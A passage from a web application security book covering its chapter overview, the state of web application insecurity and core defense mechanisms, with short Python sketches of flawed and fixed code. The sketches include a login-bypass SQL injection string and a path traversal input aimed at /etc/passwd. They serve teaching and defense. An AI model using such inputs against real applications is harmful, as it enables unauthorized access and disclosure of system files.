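    if quantity < 1:
        raise ValueError("quantity must be positive")
    return CATALOGUE[form["item"]] * quantity


# A user who edits the hidden field can name their own price.
tampered = {"item": "book", "price": "1", "quantity": "1"}
print(total_trusting_client(tampered))  # the tampered price is accepted
print(total_server_side(tampered))      # the catalogue price is charged
```

The point of the sketch is only that any value sent via the client has to be treated as user input; how a real application should protect such data depends on its design.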

Chapters 6 to 8 examine some of the most important defense mechanisms

implemented within web applications: those responsible for controlling user

access. Chapter 6, “Attacking Authentication,” examines the various functions

by which applications gain assurance of the identity of their users. This

includes the main login function and also the more peripheral authentication-

related functions such as user registration, password changing, and account

recovery. Authentication mechanisms contain a wealth of different vulnerabil-

ities, in both design and implementation, which an attacker can leverage to

gain unauthorized access. These range from obvious defects, such as bad pass-

words and susceptibility to brute-force attacks, to more obscure problems

within the authentication logic. We also examine in detail the type of multi-

stage login mechanisms used in many security-critical applications, and

describe the new kinds of vulnerability which these frequently contain.

Chapter 7, “Attacking Session Management,” examines the mechanism by

which most applications supplement the stateless HTTP protocol with the con-

cept of a stateful session, enabling them to uniquely identify each user across

several different requests. This mechanism is a key target when you are attack-

ing a web application, because if you can break it, then you can effectively

bypass the login and masquerade as other users without knowing their cre-

dentials. We look at various common defects in the generation and transmis-

sion of session tokens, and describe the steps you can take to discover and

exploit these.
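
One common defect in token generation is predictability. The following sketch contrasts a hypothetical sequential token with one drawn from a cryptographically strong source. The function names and the starting counter value are assumptions made for illustration.

```python
import itertools
import secrets

_counter = itertools.count(1000)  # hypothetical starting value


def next_token_predictable() -> str:
    # Flawed: anyone holding one token can guess its neighbours.
    return str(next(_counter))


def next_token_random() -> str:
    # 32 bytes from the operating system's CSPRNG, URL-safe encoded.
    return secrets.token_urlsafe(32)


first = next_token_predictable()
second = next_token_predictable()
print(first, second)        # consecutive values
print(next_token_random())  # differs on every call
```

An attacker who is issued the first token can simply try adjacent values to hijack other users' sessions, whereas the random token gives no such foothold.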

Chapter 8, “Attacking Access Controls,” examines the ways in which appli-

cations actually enforce access controls, relying upon the authentication and

session management mechanisms to do so. We describe various ways in which

access controls can be broken and the ways in which you can detect and

exploit these weaknesses.

Chapter 9, “Injecting Code,” covers a large category of related vulnerabili-

ties, which arise when applications embed user input into interpreted code in

an unsafe way. We begin with a detailed examination of SQL injection vulner-

abilities, covering the full range of attacks from the most obvious and trivial to

advanced exploitation techniques involving out-of-band channels, inference,

and time delays. For each kind of vulnerability and attack technique, we

describe the relevant differences between three common types of databases:

MS-SQL, Oracle, and MySQL. We then cover several other categories of injec-

tion vulnerability, including the injection of operating system commands,

injection into web scripting languages, and injection into the SOAP, XPath,

SMTP, and LDAP protocols.
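
The most obvious and trivial form of SQL injection can be sketched in a few lines. The example below uses Python's built-in sqlite3 module purely for convenience (an assumption of this sketch; it is not one of the three databases named above), and the table, column, and function names are hypothetical. The password is stored in clear text only to keep the illustration short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")


def login_unsafe(name: str, password: str) -> bool:
    # Flawed: user input is concatenated into the SQL text itself.
    query = (
        "SELECT 1 FROM users WHERE name = '" + name +
        "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(name: str, password: str) -> bool:
    # Safer: placeholders keep the input as data, never as SQL syntax.
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None


# The quote closes the string and "--" comments out the password check.
payload = "admin'--"
print(login_unsafe(payload, "wrong"))         # True: login bypassed
print(login_parameterized(payload, "wrong"))  # False: treated as a literal name
```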

Chapter 10, “Exploiting Path Traversal,” examines a small but important

category of vulnerabilities that arise when user input is passed to file system

APIs in an unsafe way, enabling an attacker to retrieve or modify arbitrary

files on the web server. We describe various bypasses that may be effective

against the defenses commonly implemented to prevent path traversal

attacks.
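
A rough sketch of the underlying flaw, and of one possible check, is shown below. The base directory and function names are hypothetical, and the check is only one of several defenses an application might use.

```python
import os

BASE_DIR = "/var/www/files"  # hypothetical directory the application serves from


def resolve_unsafe(filename: str) -> str:
    # Flawed: "../" sequences in the input walk out of BASE_DIR.
    return os.path.normpath(os.path.join(BASE_DIR, filename))


def resolve_checked(filename: str) -> str:
    # Canonicalize first, then confirm the result is still under the base.
    base = os.path.realpath(BASE_DIR)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the base directory")
    return target


print(resolve_unsafe("../../../etc/passwd"))  # resolves outside BASE_DIR
print(resolve_checked("report.txt"))          # stays inside BASE_DIR
```

Checking the canonical path, rather than filtering the raw input for particular sequences, avoids depending on a list of known traversal encodings.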

Chapter 11, “Attacking Application Logic,” examines a significant, and fre-

quently overlooked, area of every application’s attack surface: the internal

logic which it carries out to implement its functionality. Defects in an applica-

tion’s logic are extremely varied and are harder to characterize than common

vulnerabilities like SQL injection and cross-site scripting. For this reason, we

present a series of real-world examples where defective logic has left an appli-

cation vulnerable, and thereby illustrate the variety of faulty assumptions

made by application designers and developers. From these different individual

flaws, we derive a series of specific tests that you can perform to locate

many types of logic flaws that often go undetected.

Chapter 12, “Attacking Other Users,” covers a large and very topical area of

related vulnerabilities which arise when defects within a web application can

enable a malicious user of the application to attack other users and compro-

mise them in various ways. The largest vulnerability of this kind is cross-site

scripting, a hugely prevalent flaw affecting the vast majority of web applica-

tions on the Internet. We examine in detail all of the different flavors of XSS

vulnerabilities, and describe an effective methodology for detecting and

exploiting even the most obscure manifestations of these. We then look at sev-

eral other types of attacks against other users, including redirection attacks,

HTTP header injection, frame injection, cross-site request forgery, session fixa-

tion, exploiting bugs in ActiveX controls, and local privacy attacks.

Chapter 13, “Automating Bespoke Attacks,” does not introduce any new

categories of vulnerability, but instead, describes a crucial technique which

you need to master to attack web applications effectively. Because every web

application is different, most attacks are bespoke (or custom-made) in some

way, tailored to the application’s specific behavior and the ways you have dis-

covered to manipulate it to your advantage. They also frequently require issu-

ing a large number of similar requests and monitoring the application’s

responses. Performing these requests manually is extremely laborious and

prone to mistakes. To become a truly accomplished web application

hacker, you need to automate as much of this work as possible, to make your

bespoke attacks easier, faster, and more effective. In this chapter, we describe

in detail a proven methodology for achieving this.

Chapter 14, “Exploiting Information Disclosure,” examines various ways in

which applications leak information when under active attack. When you are

performing all of the other types of attacks described in this book, you should

always monitor the application to identify further sources of information

disclosure that you can exploit. We describe how you can investigate anom-

alous behavior and error messages to gain a deeper understanding of the

application’s internal workings and fine-tune your attack. We also cover ways

of manipulating defective error handling to systematically retrieve sensitive

information from the application.

Chapter 15, “Attacking Compiled Applications,” examines a set of impor-

tant vulnerabilities which arise in applications written in native code lan-

guages like C and C++. These vulnerabilities include buffer overflows, integer

vulnerabilities, and format string flaws. This is a potentially huge topic, and

we focus on ways of detecting these vulnerabilities in web applications, and

look at some real-world examples of how these have arisen and been

exploited.

Chapter 16, “Attacking Application Architecture,” examines an important

area of web application security that is frequently overlooked. Many applica-

tions employ a tiered architecture, and a failure to segregate different tiers

properly often leaves an application vulnerable, enabling an attacker who has

found a defect in one component to quickly compromise the entire applica-

tion. A different range of threats arises in shared hosting environments, where

defects or malicious code in one application can sometimes be exploited to

compromise the environment itself and other applications running within it.

Chapter 17, “Attacking the Web Server,” describes various ways in which

you can target a web application by targeting the web server on which it is

running. Vulnerabilities in web servers are broadly composed of defects in

their configuration and security flaws within the web server software. This

topic is on the boundary of the scope of this book, because the web server is

strictly a different component in the technology stack. However, most web

applications are intimately bound up with the web server on which they run;

therefore, attacks against the web server are included in the book because they

can often be used to compromise an application directly, rather than indirectly

by first compromising the underlying host.

Chapter 18, “Finding Vulnerabilities in Source Code,” describes a com-

pletely different approach to finding security flaws than those described else-

where within this book. There are many situations in which it may be possible

to perform a review of an application’s source code, not all of which require

any cooperation from the application’s owner. Reviewing an application’s

source code can often be highly effective in discovering vulnerabilities that

would be difficult or time-consuming to detect by probing the running appli-

cation. We describe a methodology, and provide a language-by-language cheat

sheet, to enable you to perform an effective code review even if you have very

limited programming experience yourself.

Chapter 19, “A Web Application Hacker’s Toolkit,” pulls together in one place

the various tools described in the course of this book, and which the authors use

when attacking real-world web applications. We describe the strengths and

weaknesses of different tools, explain the extent to which any fully automated

tool can be effective in finding web application vulnerabilities, and provide

some tips and advice for getting the most out of your toolkit.

Chapter 20, “A Web Application Hacker’s Methodology,” contains a com-

prehensive and structured collation of all the procedures and techniques

described in this book. These are organized and ordered according to the logi-

cal dependencies between tasks when you are carrying out an actual attack. If

you have read and understood all of the vulnerabilities and techniques

described in this book, you can use this methodology as a complete checklist

and work plan when carrying out an attack against a web application.

Tools You Will Need

This book is strongly geared towards the hands-on techniques that you can use

to attack web applications. After reading the book, you will understand the

specifics of each individual task, what it involves technically, and why it works

in helping you detect and exploit vulnerabilities. The book is emphatically not

about downloading some tool, pointing it at a target application, and believing

what the tool’s output tells you about the state of the application’s security.

That said, there are several tools which you will find useful, and sometimes

indispensable, when performing the tasks and techniques that we describe. All

of these are easily available on the Internet, and we recommend that you

download and experiment with each tool at the point where it appears in the

course of the book.

What's on the Web Site

The companion web site for this book at www.wiley.com/go/webhacker con-

tains several resources that you will find useful in the course of mastering the

techniques we describe and using them to attack actual applications. In partic-

ular, the web site contains the following:

■ Source code to some of the scripts we present in the book.

■ A list of current links to all of the tools and other resources discussed in the book.

■ A handy checklist of the tasks involved in attacking a typical application.

■ Answers to the questions posed at the end of each chapter.

■ A hacking challenge containing many of the vulnerabilities described in the book.

Bring It On

Web application security is a fun and thriving subject. We enjoyed writing this

book as much as we continue to enjoy hacking into web applications on a daily

basis. We hope that you will also take pleasure from learning about the differ-

ent techniques we describe and how these can be defended against.

Before going any further, we should mention an important caveat. In most

countries, attacking computer systems without the owner’s permission is

against the law. The majority of the techniques we describe are illegal if carried

out without consent.

The authors are professional penetration testers who routinely attack web

applications on behalf of clients, to help them improve their security. In recent

years, numerous security professionals and others have acquired criminal

records, and ended their careers, by experimenting on or actively attacking

computer systems without permission. We urge you to use the information

contained in this book only for lawful purposes.

There is no doubt that web application security is a current and very news-

worthy subject. For all concerned, the stakes are high: for businesses that

derive increasing revenue from Internet commerce, for users who trust web

applications with sensitive information, and for criminals who can make big

money by stealing payment details or compromising bank accounts. Reputa-

tion plays a critical role: few people want to do business with an insecure web

site, and so few organizations want to disclose details about their own security

vulnerabilities or breaches. Hence, it is not trivial to obtain reliable informa-

tion about the state of web application security today.

This chapter takes a brief look at how web applications have evolved and the

many benefits they provide. We present some metrics about vulnerabilities in

current web applications, drawn from the authors’ direct experience, demon-

strating that the majority of applications are far from secure. We describe the

core security problem facing web applications — that users can supply arbi-

trary input — and the various factors that contribute to their weak security pos-

ture. Finally, we describe the latest trends in web application security and the

ways in which these may be expected to develop in the near future.

Web Application (In)security

CHAPTER

The Evolution of Web Applications

In the early days of the Internet, the World Wide Web consisted only of web sites.

These were essentially information repositories containing static documents,

and web browsers were invented as a means of retrieving and displaying those

documents, as shown in Figure 1-1. The flow of interesting information was one-

way, from server to browser. Most sites did not authenticate users, because there

was no need to — each user was treated in the same way and presented with the

same information. Any security threats arising from hosting a web site related

largely to vulnerabilities in web server software (of which there were many). If

an attacker compromised a web server, he would not normally gain access to

any sensitive information, because the information held on the server was

already open to public view. Rather, an attacker would typically modify the files

on the server to deface the web site’s contents, or use the server’s storage and

bandwidth to distribute “warez.”

Figure 1-1: A traditional web site containing static information

Today, the World Wide Web is almost unrecognizable from its earlier form.

The majority of sites on the web are in fact applications (see Figure 1-2). They

are highly functional, and rely upon two-way flow of information between the

server and browser. They support registration and login, financial transactions,

search, and the authoring of content by users. The content presented to users is

generated dynamically on the fly, and is often tailored to each specific user.

Much of the information processed is private and highly sensitive. Security is

therefore a big issue: no one wants to use a web application if they believe their

information will be disclosed to unauthorized parties.

Web applications bring with them new and significant security threats. Each

application is different and may contain unique vulnerabilities. Most applica-

tions are developed in-house, and many by developers who have little under-

standing of the security problems that may arise in the code they are

producing. To deliver their core functionality, web applications normally

require connectivity to internal computer systems that contain highly sensitive

data and are able to perform powerful business functions. Ten years ago, if you

wanted to make a funds transfer, you visited your bank and someone per-

formed it for you; today, you can visit their web application and perform it

yourself. An attacker who compromises a web application may be able to steal

personal information, carry out financial fraud, and perform malicious actions

against other users.

Figure 1-2: A typical web application

Common Web Application Functions

Web applications have been created to perform practically every useful func-

tion one could possibly implement online. Examples of web application func-

tions that have risen to prominence in recent years include:

■ Shopping (Amazon)

■ Social networking (MySpace)

■ Banking (Citibank)

■ Web search (Google)

■ Auctions (eBay)

■ Gambling (Betfair)

■ Web logs (Blogger)

■ Web mail (Hotmail)

■ Interactive information (Wikipedia)

In addition to the public Internet, web applications have been widely

adopted inside organizations to perform key business functions, including

accessing HR services and managing company resources. They are also fre-

quently used to provide an administrative interface to hardware devices such

as printers, and other software such as web servers and intrusion detection

systems.

Numerous applications that predated the rise of web applications have been

migrated to this technology. Business applications like enterprise resource

planning (ERP) software, which were previously accessed using a proprietary

thick-client application, can now be accessed using a web browser. Software

services such as email, which originally required a separate email client, can

now be accessed via web interfaces like Outlook Web Access. This trend is con-

tinuing as traditional desktop office applications such as word processors and

spreadsheets are migrated to web applications, through services like Google

Apps and Microsoft Office Live.

The time is fast approaching when the only client software that most com-

puter users will need is a web browser. A hugely diverse range of functions

will have been implemented using a shared set of protocols and technologies,

and in so doing will have inherited a distinctive range of common security

vulnerabilities.

Benefits of Web Applications

It is not difficult to see why web applications have enjoyed such a dramatic

rise to prominence. Several technical factors have worked alongside the obvi-

ous commercial incentives to drive the revolution that has occurred in the way

we use the Internet:

■ HTTP, the core communications protocol used to access the World Wide Web, is lightweight and connectionless. This provides resilience in the event of communication errors and avoids the need for the server to hold open a network connection to every user as was the case in many legacy client-server applications. HTTP can also be proxied and tunneled over other protocols, allowing for secure communication in any network configuration.

■ Every web user already has a browser installed on their computer. Web applications deploy their user interface dynamically to the browser, avoiding the need to distribute and manage separate client software, as was the case with pre-web applications. Changes to the interface only need to be implemented once, on the server, and take effect immediately.

■ Today’s browsers are highly functional, enabling rich and satisfying user interfaces to be built. Web interfaces use standard navigational and input controls that are immediately familiar to users, avoiding the need to learn how each individual application functions. Client-side scripting enables applications to push part of their processing to the client side, and browsers’ capabilities can be extended in arbitrary ways using thick-client components where necessary.

■ The core technologies and languages used to develop web applications are relatively simple. A wide range of platforms and development tools are available to facilitate the development of powerful applications by relative beginners, and a large quantity of open source code and other resources is available for incorporation into custom-built applications.

Web Application Security

As with any new class of technology, web applications have brought with

them a new range of security vulnerabilities. The set of most commonly

encountered defects has evolved somewhat over time. New attacks have been

conceived that were not considered when existing applications were devel-

oped. Some problems have become less prevalent as awareness of them has

increased. New technologies have been developed that have introduced new

possibilities for exploitation. Some categories of flaws have largely gone away

as the result of changes made to web browser software.

Throughout this evolution, compromises of prominent web applications

have remained in the news, and there is no sense that a corner has been turned

and that these security problems are on the wane. Arguably, web application

security is today the most significant battleground between attackers and

those with computer resources and data to defend, and it is likely to remain so

for the foreseeable future.

“This Site Is Secure”

There is a widespread awareness that security is an “issue” for web applica-

tions. Consult the FAQ page of a typical application, and you will be reassured

that it is in fact secure. For example:

This site is absolutely secure. It has been designed to use 128-bit Secure Socket

Layer (SSL) technology to prevent unauthorized users from viewing any of your

information. You may use this site with peace of mind that your data is safe with us.

In virtually every case, web applications state that they are secure because

they use SSL. Users are often urged to verify the site’s certificate, admire the

advanced cryptographic protocols in use, and on this basis, trust it with their

personal information.

In fact, the majority of web applications are insecure, and in ways that have

nothing to do with SSL. The authors of this book have tested hundreds of web

applications in recent years. Figure 1-3 shows the proportions of those appli-

cations tested during 2006 and 2007 that were found to be affected by some

common categories of vulnerability. These are explained briefly below:

■ Broken authentication (67%): This category of vulnerability encompasses various defects within the application’s login mechanism, which may enable an attacker to guess weak passwords, launch a brute-force attack, or bypass the login altogether.

■ Broken access controls (78%): This involves cases where the application fails to properly protect access to its data and functionality, potentially enabling an attacker to view other users’ sensitive data held on the server, or carry out privileged actions.

■ SQL injection (36%): This vulnerability enables an attacker to submit crafted input to interfere with the application’s interaction with back-end databases. An attacker may be able to retrieve arbitrary data from the application, interfere with its logic, or execute commands on the database server itself.

■ Cross-site scripting (91%): This vulnerability enables an attacker to target other users of the application, potentially gaining access to their data, performing unauthorized actions on their behalf, or carrying out other attacks against them.

■ Information leakage (81%): This involves cases where an application divulges sensitive information that is of use to an attacker in developing an assault against the application, through defective error handling or other behavior.

Figure 1-3 The incidence of some common web application vulnerabilities in

applications recently tested by the authors (based on a sample of more than 100)

SSL is an excellent technology that protects the confidentiality and integrity

of data in transit between the user’s browser and the web server. It helps to

defend against eavesdroppers, and it can provide assurance to the user of the

identity of the web server they are dealing with. But it does not stop attacks

that directly target the server or client components of an application, as most

successful attacks do. Specifically, it does not prevent any of the vulnerabilities

listed previously, or many others that can render an application critically

exposed to attack. Regardless of whether or not they use SSL, most web appli-

cations still contain security flaws.

NOTE Although SSL has nothing to do with the majority of web application

vulnerabilities, do not infer that it is unnecessary to an application’s security.

Properly used, SSL provides an effective defense against several important

attacks. An occasional mistake by developers is to eschew industry-standard

cryptography in favor of a home-grown solution, which as a rule is more

expensive and less effective. Consider the following (actual) FAQ answer, which

rings even louder alarm bells than the orthodox wisdom described previously:

This site is secure. For your safety (and our peace of mind) we do not use

“standard” security procedures such as SSL but proprietary protocols which we

won’t disclose in detail here but permit immediate transfer of any data you

submit to a completely secure location. In other words the data never stays on

a server “floating in cyberspace,” which allows us to keep potential

malfeasants in the dark.

[Figure 1-3 bar chart. Horizontal axis: incidence in recently tested applications, 0% to 100%. Bars: broken authentication 67%, broken access controls 78%, SQL injection 36%, cross-site scripting 91%, information leakage 81%.]

The Core Security Problem:

Users Can Submit Arbitrary Input

As with most distributed applications, web applications face a fundamental

problem which they must address in order to be secure. Because the client is

outside of the application’s control, users can submit completely arbitrary

input to the server-side application. The application must assume that all input

is potentially malicious, and must take steps to ensure that attackers cannot use

crafted input to compromise the application by interfering with its logic and

behavior and gaining unauthorized access to its data and functionality.

This core problem manifests itself in various ways:

■■

Users can interfere with any piece of data transmitted between the

client and the server, including request parameters, cookies, and HTTP

headers. Any security controls implemented on the client side, such as

input validation checks, can be easily circumvented.

■■

Users can send requests in any sequence, and can submit parameters at

a different stage than the application expects, more than once, or not at

all. Any assumption which developers make about how users will

interact with the application may be violated.

■■

Users are not restricted to using only a web browser to access the appli-

cation. There are numerous widely available tools that operate along-

side, or independently of, a browser, to help attack web applications.

These tools can make requests that no browser would ordinarily make,

and can generate huge numbers of requests quickly to find and exploit

problems.

The majority of attacks against web applications involve sending input to

the server which is crafted to cause some event that was not expected or

desired by the application’s designer. Some examples of submitting crafted

input to achieve this objective are as follows:

■■

Changing the price of a product transmitted in a hidden HTML form field, to fraudulently purchase the product at a lower price.

■■

Modifying a session token transmitted in an HTTP cookie, to hijack the

session of another authenticated user.

■■

Removing certain parameters that are normally submitted, to exploit a

logic flaw in the application’s processing.

■■

Altering some input that will be processed by a back-end database, to

inject a malicious database query and so access sensitive data.

Needless to say, SSL does nothing to stop an attacker from submitting

crafted input to the server. If the application uses SSL, this simply means that

other users on the network cannot view or modify the attacker’s data in tran-

sit. Because the attacker controls her end of the SSL tunnel, she can send any-

thing she likes to the server through this tunnel. If any of the previously

mentioned attacks are successful, then the application is emphatically vulner-

able, regardless of what its FAQ may tell you.
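The hidden-field price example can be made concrete with a minimal sketch of one defense, in which the server computes the amount to charge from its own records and never from anything the client submits. The catalogue contents, the field names (product_id, quantity, price) and the function name order_total are assumptions made for illustration, not part of any particular application.

```python
from decimal import Decimal

# Hypothetical server-side catalogue; a real application would query its database.
CATALOGUE = {
    "SKU-1001": Decimal("449.00"),
    "SKU-1002": Decimal("19.99"),
}


def order_total(form: dict) -> Decimal:
    """Compute the amount to charge using server-side data only."""
    product_id = form.get("product_id")
    if product_id not in CATALOGUE:
        raise ValueError("unknown product")
    try:
        quantity = int(form.get("quantity", ""))
    except (TypeError, ValueError):
        raise ValueError("quantity must be an integer") from None
    if not 1 <= quantity <= 100:
        raise ValueError("quantity out of range")
    # Any "price" field in the form is deliberately ignored, because the
    # client controls it and may have changed it.
    return CATALOGUE[product_id] * quantity


# A tampered hidden field has no effect on the amount charged.
tampered = {"product_id": "SKU-1001", "quantity": "2", "price": "0.01"}
print(order_total(tampered))
```

The same reasoning applies whether or not the request travels over SSL: the tunnel protects the data in transit, but the attacker chooses what goes into it.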

Key Problem Factors

The core security problem faced by web applications arises in any situation

where an application must accept and process untrusted data that may be

malicious. However, in the case of web applications, there are several factors

which have combined to exacerbate the problem, and which explain why

so many web applications on the Internet today do such a poor job of address-

ing it.

Immature Security Awareness

There is a less mature level of awareness of web application security issues

than there is in longer-established areas such as networks and operating sys-

tems. While most people working in IT security have a reasonable grasp of the

essentials of securing networks and hardening hosts, there is still widespread

confusion and misconception about many of the core concepts involved in

web application security. It is common to meet experienced web application

developers to whom an explanation of many basic types of flaws comes as a

complete revelation.

In-House Development

Most web applications are developed in-house by an organization’s own staff

or contractors. Even where an application employs third-party components,

these are typically customized or bolted together using new code. In this situ-

ation, every application is different and may contain its own unique defects.

This stands in contrast to a typical infrastructure deployment in which an

organization can purchase a best-of-breed product and install it in line with

industry-standard guidelines.

Deceptive Simplicity

With today’s web application platforms and development tools, it is possible

for a novice programmer to create a powerful application from scratch in a

short period of time. But there is a huge difference between producing code

that is functional and code that is secure. Many web applications are created

by well-meaning individuals who simply lack the knowledge and experience

to identify where security problems may arise.

Rapidly Evolving Threat Profile

Because the field is relatively immature, research into web application attacks and defenses is a thriving area in which new concepts and threats are conceived at a faster rate than is now the case for older technologies. A development team

that begins a project with a complete knowledge of current threats may well

have lost this status by the time the application is completed and deployed.

Resource and Time Constraints

Most web application development projects are subject to strict constraints on time and resources, arising from the economics of in-house, one-off development. It is not usually possible to employ dedicated security expertise in the design or development teams, and, because of project slippage, security testing by specialists is often left until very late in the project’s lifecycle. In the balancing

of competing priorities, the need to produce a stable and functional applica-

tion by a deadline normally overrides less tangible security considerations. A

typical small organization may be willing to pay for only a few man-days of

consulting time to evaluate a new application. A quick penetration test will

often find the low-hanging fruit, but it may miss more subtle vulnerabilities

that require time and patience to identify.

Overextended Technologies

Many of the core technologies employed in web applications began life when

the landscape of the World Wide Web was very different, and have since been

pushed far beyond the purposes for which they were originally conceived —

for example, the use of JavaScript as a means of data transmission in many

AJAX-based applications. As the expectations placed on web application func-

tionality have rapidly evolved, the technologies used to implement this func-

tionality have lagged behind the curve, with old technologies stretched and

adapted to meet new requirements. Unsurprisingly, this has led to security

vulnerabilities as unforeseen side effects emerge.

The New Security Perimeter

Before the rise of web applications, organizations’ efforts to secure themselves

against external attack were largely focused on the network perimeter. Defend-

ing this perimeter entailed hardening and patching the services that it needed

to expose, and firewalling access to others.

Web applications have changed all of this. For an application to be accessi-

ble by its users, the perimeter firewall must allow inbound connections to the

server over HTTP/S. And for the application to function, the server must be

allowed to connect to supporting back-end systems, such as databases, main-

frames, and financial and logistical systems. These systems often lie at the core

of the organization’s operations and reside behind several layers of network-

level defenses.

If a vulnerability exists within a web application, then an attacker on the

public Internet may be able to compromise the organization’s core back-end

systems solely by submitting crafted data from his web browser. This data will

sail past all of the organization’s network defenses, in just the same way as

does ordinary, benign traffic to the web application.

The effect of widespread deployment of web applications is that the security

perimeter of a typical organization has moved. Part of that perimeter is still

embodied in firewalls and bastion hosts. But a significant part of it is now

occupied by the organization’s web applications. Because of the manifold

ways in which web applications receive user input and pass this to sensitive

back-end systems, they are the potential gateways for a wide range of attacks,

and defenses against these attacks must be implemented within the applica-

tions themselves. A single line of defective code in a single web application can

render an organization’s internal systems vulnerable. The statistics described

previously, of the incidence of vulnerabilities within this new security perime-

ter, should give every organization pause for thought.

NOTE For an attacker targeting an organization, gaining access to the

network or executing arbitrary commands on servers may well not be what

they really want to achieve. Often, and perhaps typically, what an attacker

really desires is to perform some application-level action such as stealing

personal information, transferring funds, or making cheap purchases. And the

relocation of the security perimeter to the application layer may greatly assist

an attacker in achieving these objectives.

For example, suppose that an attacker wishes to “hack in” to a bank’s systems

and steal money from users’ accounts. Before the bank deployed a web

application, the attacker might have needed to find a vulnerability in a publicly

reachable service, exploit this to gain a toehold on the bank’s DMZ, penetrate

the firewall restricting access to its internal systems, map the network to find

the mainframe computer, decipher the arcane protocol used to access it, and

then guess some credentials in order to log in. However, if the bank deploys a

vulnerable web application, then the attacker may be able to achieve the same

outcome simply by modifying an account number in a hidden field of an HTML

form.

A second way in which web applications have moved the security perime-

ter arises from the threats that users themselves face when they access a vul-

nerable application. A malicious attacker can leverage a benign but vulnerable

web application to attack any user who visits it. If that user is located on an

internal corporate network, the attacker may harness the user’s browser to

launch an attack against the local network from the user’s trusted position.

Without any cooperation from the user, the attacker may be able to carry out

any action that the user could perform if she were herself malicious.

Network administrators are familiar with the idea of preventing their users

from visiting malicious web sites, and end users themselves are gradually

becoming more aware of this threat. But the nature of web application vulner-

abilities means that a vulnerable application may present no less of a threat to

its users and their organization than a web site that is overtly malicious. Cor-

respondingly, the new security perimeter imposes a duty of care on all appli-

cation owners to protect their users from attacks against them delivered via

the application.

The Future of Web Application Security

Several years after their widespread adoption, web applications on the Internet

today are still rife with vulnerabilities. Understanding of the security threats

facing web applications, and effective ways of addressing these, remains imma-

ture within the industry. There is currently little indication that the problem fac-

tors described previously are going to go away in the near future.

That said, the details of the web application security landscape are not static. While old and well-understood vulnerabilities like SQL injection continue to appear, their prevalence is gradually diminishing. Further, the instances

that remain are becoming more difficult to find and exploit. Much current

research is focused on developing advanced techniques for attacking more

subtle manifestations of vulnerabilities which a few years ago could be easily

detected and exploited using only a browser.

A second prominent trend is a gradual shift in attention from traditional

attacks against the server side of the application to those that target other

users. The latter kind of attack still leverages defects within the application

itself, but it generally involves some kind of interaction with another user, to

compromise that user’s dealings with the vulnerable application. This is a

trend that has been replicated in other areas of software security. As awareness

of security threats matures, flaws in the server side are the first to be well

understood and addressed, leaving the client side as a key battleground as the

learning process continues. Of all the attacks described in this book, those

against other users are evolving the most quickly, and are the focus of most

current research.

Chapter Summary

In a few short years, the World Wide Web has evolved from purely static infor-

mation repositories into highly functional applications that process sensitive

data and perform powerful actions with real-world consequences. During this

development, several factors have combined to bring about the weak security

posture demonstrated by the majority of today’s web applications.

Most applications face the core security problem that users can submit arbi-

trary input. Every aspect of the user’s interaction with the application may be

malicious and should be regarded as such unless proven otherwise. Failure to

properly address this problem can leave applications vulnerable to attack in

numerous ways.

All of the evidence about the current state of web application security indi-

cates that this problem has not been resolved on any significant scale, and that

attacks against web applications present a serious threat both to the organiza-

tions that deploy them and to the users who access them.

CHAPTER 2

Core Defense Mechanisms

The fundamental security problem with web applications, that all user input is untrusted, gives rise to a number of security mechanisms that applications use to defend themselves against attack. Virtually all applications employ mechanisms that are conceptually similar, although the details of the design and the effectiveness of the implementation differ very widely indeed.

The defense mechanisms employed by web applications comprise the following core elements:

■■

Handling user access to the application’s data and functionality, to prevent users from gaining unauthorized access.

■■

Handling user input to the application’s functions, to prevent malformed input from causing undesirable behavior.

■■

Handling attackers, to ensure that the application behaves appropriately when being directly targeted, taking suitable defensive and offensive measures to frustrate the attacker.

■■

Managing the application itself, by enabling administrators to monitor its activities and configure its functionality.

Because of their central role in addressing the core security problem, these mechanisms also make up the vast majority of a typical application’s attack surface. If knowing your enemy is the first rule of warfare, then understanding these mechanisms thoroughly is the main prerequisite to being able to attack applications effectively. If you are new to hacking web applications, and even if you are not, you should be sure to take time to understand how these core mechanisms work in each of the applications you encounter, and identify the weak points that leave them vulnerable to attack.

Handling User Access

A central security requirement that virtually any application needs to meet is

to control users’ access to its data and functionality. In a typical situation, there

are several different categories of user; for example, anonymous users, ordi-

nary authenticated users, and administrative users. Further, in many situa-

tions different users are permitted to access a different set of data; for example,

users of a web mail application should be able to read their own email but not

other people’s.

Most web applications handle access using a trio of interrelated security

mechanisms:

■■

Authentication

■■

Session management

■■

Access control

Each of these mechanisms represents a significant area of an application’s

attack surface, and each is absolutely fundamental to an application’s overall

security posture. Because of their interdependencies, the overall security pro-

vided by the mechanisms is only as strong as the weakest link in the chain. A

defect in any single component may enable an attacker to gain unrestricted

access to the application’s functionality and data.

Authentication

The authentication mechanism is logically the most basic dependency in an

application’s handling of user access. Authenticating a user involves estab-

lishing that the user is in fact who he claims to be. Without this facility, the

application would need to treat all users as anonymous — the lowest possible

level of trust.

The majority of today’s web applications employ the conventional authenti-

cation model in which the user submits a username and password, which the

application checks for validity. Figure 2-1 shows a typical login function. In secu-

rity-critical applications such as those used by online banks, this basic model is

usually supplemented by additional credentials and a multistage login process.

When security requirements are higher still, other authentication models may be

used, based on client certificates, smartcards, or challenge-response tokens. In

addition to the core login process, authentication mechanisms often employ a

range of other supporting functionality, such as self-registration, account recov-

ery, and a password change facility.

Figure 2-1: A typical login function

Despite their superficial simplicity, authentication mechanisms suffer from

a wide range of defects, in both design and implementation. Common prob-

lems may enable an attacker to identify other users’ usernames, guess their

passwords, or bypass the login function altogether by exploiting defects in its

logic. When you are attacking a web application, you should invest a signifi-

cant amount of attention in the various authentication-related functions that it

contains. Surprisingly frequently, defects in this functionality will enable you

to gain unauthorized access to sensitive data and functionality.
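To illustrate how a login function can avoid two of the problems just mentioned, the following is a minimal sketch rather than a complete design. It gives the same answer for an unknown username and a wrong password, so the response does not reveal which usernames exist, and it compares password hashes in constant time. The in-memory USERS store, the function names, and the choice of PBKDF2 with this iteration count are all assumptions made for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # illustrative work factor chosen for this sketch


def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a password hash with PBKDF2-HMAC-SHA256."""
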